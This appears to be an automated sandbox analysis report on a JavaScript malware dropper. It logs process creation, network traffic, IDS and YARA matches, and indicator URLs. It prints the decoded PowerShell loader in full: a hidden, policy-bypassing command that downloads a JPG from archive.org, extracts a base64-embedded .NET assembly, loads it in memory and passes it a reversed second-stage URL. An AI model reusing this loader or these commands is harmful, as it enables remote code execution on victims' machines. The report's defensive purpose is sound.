        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: ion.pdb source: powershell.exe, 00000004.00000002.2221743469.000001C26C9C9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp

        Software Vulnerabilities

        Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: global traffic HTTP traffic detected: GET /10/items/deathnote_202407/deathnote.jpg HTTP/1.1 Host: ia601606.us.archive.org Connection: Keep-Alive
        Source: global traffic HTTP traffic detected: GET /wp-admin/sky.txt HTTP/1.1 Host: maso.ge Connection: Keep-Alive
        Source: Joe Sandbox View IP Address: 195.54.178.4
        Source: Joe Sandbox View IP Address: 207.241.227.86
        Source: Joe Sandbox View ASN Name: INTERNET-ARCHIVEUS
        Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic DNS traffic detected: DNS query: ia601606.us.archive.org
        Source: global traffic DNS traffic detected: DNS query: maso.ge
        Source: Network traffic Suricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.86:443 -> 192.168.2.5:49704
        Source: powershell.exe, 00000004.00000002.2178327964.000001C201634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ia601606.us.archive.org
        Source: powershell.exe, 00000004.00000002.2178327964.000001C2003CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://maso.ge
        Source: powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178327964.000001C201909000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000004.00000002.2178327964.000001C200223000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.2231182452.000001D3800BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178327964.000001C200001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000004.00000002.2178327964.000001C20167C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: powershell.exe, 00000004.00000002.2178327964.000001C200223000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000002.00000002.2231182452.000001D38006D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6
        Source: powershell.exe, 00000002.00000002.2231182452.000001D38008A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178327964.000001C200001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000004.00000002.2178327964.000001C201909000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000004.00000002.2178327964.000001C201909000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000004.00000002.2178327964.000001C201909000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000004.00000002.2178327964.000001C200223000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000004.00000002.2178327964.000001C2010CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
        Source: powershell.exe, 00000002.00000002.2259432896.000001D3FED95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.co
        Source: powershell.exe, 00000004.00000002.2178327964.000001C20162E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia601606.us.arXzJ
        Source: powershell.exe, 00000004.00000002.2178327964.000001C20162E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178327964.000001C200223000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia601606.us.archive.org
        Source: powershell.exe, 00000002.00000002.2231182452.000001D3807D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia601606.us.archive.org/10/items/deathnote
        Source: powershell.exe, 00000004.00000002.2178327964.000001C200001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
        Source: powershell.exe, 00000004.00000002.2178327964.000001C2003CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://maso.ge
        Source: powershell.exe, 00000004.00000002.2178327964.000001C2003CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://maso.ge/wp-admin/sky.txt
        Source: powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178327964.000001C201909000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000004.00000002.2178327964.000001C20167C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
        Source: powershell.exe, 00000004.00000002.2178327964.000001C20167C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
        Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknown HTTPS traffic detected: 207.241.227.86:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 195.54.178.4:443 -> 192.168.2.5:49705 version: TLS 1.2

        System Summary

        Source: Process Memory Space: powershell.exe PID: 5752, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 6800, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 9300
        Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[base64-encoded payload omitted]'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FF848FF2410
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FF848FF1BB0
        Source: 15514541_Doc_Sub(C-A0893)10-08-2024.js Initial sample: Strings found which are bigger than 50
        Source: Process Memory Space: powershell.exe PID: 5752, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 6800, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engine Classification label: mal100.expl.evad.winJS@9/5@2/2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2132:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mplkwni5.f2l.ps1
        Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: 15514541_Doc_Sub(C-A0893)10-08-2024.js Virustotal: Detection: 12%
        Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\15514541_Doc_Sub(C-A0893)10-08-2024.js"
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\neuromo.js"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\neuromo.js"
        Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
